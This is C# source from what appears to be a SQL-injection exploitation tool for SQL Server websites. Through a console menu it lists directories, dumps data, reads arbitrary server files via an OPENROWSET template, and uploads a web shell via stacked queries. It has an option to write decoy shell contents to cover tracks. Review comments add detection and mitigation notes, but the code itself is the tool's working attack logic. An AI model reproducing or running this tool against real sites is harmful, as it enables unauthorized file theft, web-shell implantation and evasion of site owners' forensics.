/// <summary>
/// Console entry point. Loads the query templates, shows the banner, then
/// repeatedly asks for a target URL and offers a numeric menu that dispatches
/// to the directory-listing, data-dump, file-read and file-upload modules.
/// Entering "x" at the URL prompt ends the session.
/// </summary>
/// <param name="args">Command-line arguments; not read by this method.</param>
static void Main(string[] args)
{
    // Menu text is handed to UserInteraction unchanged; option numbers map to the switch below.
    const string MenuText =
        "Press '0' for Exit..\nPress '1' for directory navigation..\nPress '2' for dumping data.."
        + "\nPress '3' for files reading..\nPress '4' for shell uploading..";

    QueriesDB.initialize();
    UserInteraction.showBanner();

    string basicURL;
    do
    {
        Log.logNotification("Press 'x' for exit..");
        UserInteraction.promptForUserInput("Enter url");
        basicURL = Console.ReadLine();

        // NOTE(review): initialize() runs on every input, including "x", empty
        // and null (end of input); what it does with such a value is not visible here.
        Exploitation.initialize(basicURL);

        if (basicURL == "x" || String.IsNullOrEmpty(basicURL))
        {
            // Nothing to operate on: "x" ends the outer loop, empty/null re-prompts.
            continue;
        }

        int selection;
        do
        {
            selection = UserInteraction.showMenuForIntChoice(MenuText);
            switch (selection)
            {
                case 1:
                    DirListing.initialize(basicURL);
                    break;
                case 2:
                    DumpData.initialize(basicURL);
                    break;
                case 3:
                    ReadFile.Read(basicURL);
                    break;
                case 4:
                    ShellSpawning.Spawn(basicURL);
                    break;
                // Any other value (including 0) dispatches nothing; 0 leaves the menu.
            }
        }
        while (selection != 0);
    }
    while (basicURL != "x");

    Log.logOutput("Program is going to exit.. Press any key..");
    Console.ReadKey();
}
/// <summary>
/// Interactive file-read loop. Builds a request URL template from
/// <c>QueriesDB.ReadFileOpenRowSetQuery</c>, substitutes each operator-supplied
/// path for the <c>[FILENAME]</c> placeholder, requests the URL, and prints the
/// filtered response. The operator may then save the output via <c>SaveFile</c>.
/// Entering "x" at the path prompt returns to the caller.
/// </summary>
/// <param name="url">Base URL of the target, passed through to <c>QueryCrafter</c>.</param>
/// <remarks>
/// NOTE(review): the template name suggests a SQL Server OPENROWSET-based read;
/// the query text is not visible here. If so, the requested file path travels in
/// the request URL, so web-server and WAF logs containing absolute file paths or
/// OPENROWSET/BULK keywords are the natural detection point, and denying bulk
/// operations to the application's database login is the natural mitigation.
/// Confirm against QueriesDB before relying on this.
/// </remarks>
public static void Read(string url)
{
    string readTemplate = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ReadFileOpenRowSetQuery);

    while (true)
    {
        string requestedPath = UserInteraction.takeInputString("Press x to exit..\nEnter full/root path for file to read.. eg. E:\\inetpub\\site\\somefile.ext ..");
        if (requestedPath == "x")
        {
            return;
        }

        // The path is substituted verbatim into the template.
        var response = HTTPMethods.getResponse(readTemplate.Replace("[FILENAME]", requestedPath));
        if (response == null)
        {
            // No response at all: prompt again without reporting an error.
            continue;
        }

        response = ResponseFilter.getPureResponseWithLastIndex(response);
        if (response == null)
        {
            Log.logError("Either File is empty or you 've no right to read that File..");
            continue;
        }

        Log.logOutput("--- [File Contents Start] ---");
        Log.logOutput(response);
        Log.logOutput("--- [File Cotents End] ---");

        // An "x" typed here does not exit; only the path prompt ends the loop.
        string saveAnswer = UserInteraction.takeInputString("Press s to save File Or Enter to Ignore..");
        if (saveAnswer == "s")
        {
            SaveFile(response);
        }
    }
}
/// <summary>
/// Interactive file-upload loop. After confirming that the target reflects the
/// marker value <c>QueriesDB.Replacement</c>, it calls <c>createProcFcUk</c>, then
/// for each operator-supplied folder and filename builds a stacked-query URL from
/// one of two templates (<c>FileUploadingQueryREAL</c> or <c>FileUploadingQueryFAKE</c>),
/// sends it, and checks the result with <c>confirmFileUpload</c>. Once the target has
/// responded, <c>dropObject</c> is always called with <c>DropFcUkProcQuery</c> before
/// returning, whether or not <c>createProcFcUk</c> succeeded.
/// </summary>
/// <param name="url">Base URL of the target, passed through to the query builders.</param>
/// <remarks>
/// NOTE(review): the query templates are not visible here. From the names and
/// prompts this appears to create a temporary database object, write a file under
/// a web-served directory, and drop the object afterwards. Defensive takeaways, to be
/// confirmed against QueriesDB: the database service account should not have write
/// access to web content directories, new script files appearing under the web root
/// should alert (file-integrity monitoring), and short-lived create/drop of database
/// objects by the application login is worth auditing.
/// </remarks>
public static void Spawn(string url)
{
    Log.logNotification("Confirming Web Response..");
    var confirmationUrl = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);
    if (!ResponseFilter.confirmResponce(confirmationUrl, QueriesDB.Replacement))
    {
        Log.logError("No response from the server..");
        return;
    }

    Log.logNotification("Web Response is OK..");

    if (createProcFcUk(url))
    {
        while (true)
        {
            string targetFolder = UserInteraction.takeInputString("Press x for Exit..\nEnter root for folder path C:\\websites\\somedir\\ ");
            if (targetFolder == "x")
            {
                break;
            }

            string fileName = UserInteraction.takeInputString("Enter filename to upload eg. shell.aspx ..");
            string contentMode = UserInteraction.takeInputString("Press 'r' for using Real Shell Contents..\nPress 'f' for fake Shell Contens to remove tracks..");

            // Anything other than "f" selects the REAL template.
            string uploadUrl = contentMode == "f"
                ? QueryCrafter.constructStackedQuery(url, QueriesDB.FileUploadingQueryFAKE)
                : QueryCrafter.constructStackedQuery(url, QueriesDB.FileUploadingQueryREAL);

            // Placeholders are filled in this fixed order; "rummykhan" is the
            // template's literal marker token, swapped for the configured one.
            uploadUrl = uploadUrl
                .Replace("[PATH]", targetFolder)
                .Replace("[FILENAME]", fileName)
                .Replace("rummykhan", QueriesDB.Replacement);

            // Folder and filename are joined by plain concatenation, no separator added.
            string destination = targetFolder + fileName;
            Log.logNotification("Uploading shell to " + destination);

            if (!ResponseFilter.confirmResponce(uploadUrl, QueriesDB.Replacement))
            {
                // Marker not reflected: prompt again without reporting an error.
                continue;
            }

            Log.logNotification("Confirming File Upload..");
            if (confirmFileUpload(url, destination))
            {
                Log.logOutput("Shell uploaded successfully to : " + destination);
            }
            else
            {
                Log.logError("Fail to upload file..");
            }
        }
    }

    // Cleanup runs whether or not the helper procedure was created.
    dropObject(url, QueriesDB.DropFcUkProcQuery);
}